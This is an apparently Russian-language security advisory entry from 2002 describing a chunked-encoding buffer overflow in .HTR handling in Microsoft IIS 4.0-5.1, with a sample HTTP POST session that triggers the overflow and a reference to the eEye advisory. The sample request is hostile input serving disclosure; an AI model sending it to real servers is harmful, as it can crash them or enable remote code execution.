Переполнение буфера и выполнение произвольного кода в Microsoft IIS 4.0-5.1

Дата публикации:
13.06.2002
Всего просмотров:
837
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в transfer chunking в комбинации с обработкой сеансов HTR запросов. Посылая специально обработанный htr сеанс, нападающий может переполнить буфер и записывать произвольные данные в память. Записанный код будет выполнен с привилегиями IWAM_computername.

Пример:

**************Begin Session****************
POST /EEYE.htr HTTP/1.1
Host: 0day.big5.com
Transfer-Encoding: chunked

20
XXXXXXXXXXXXXXXXXXXXXXXXEEYE2002
0
[enter]
[enter]
**************End Session******************
Уязвимость обнаружена в IIS 4.0-5.1

Ссылки: ADVISORY: Windows 2000 and NT4 IIS .HTR Remote Buffer Overflow [AD20020612]
или введите имя

CAPTCHA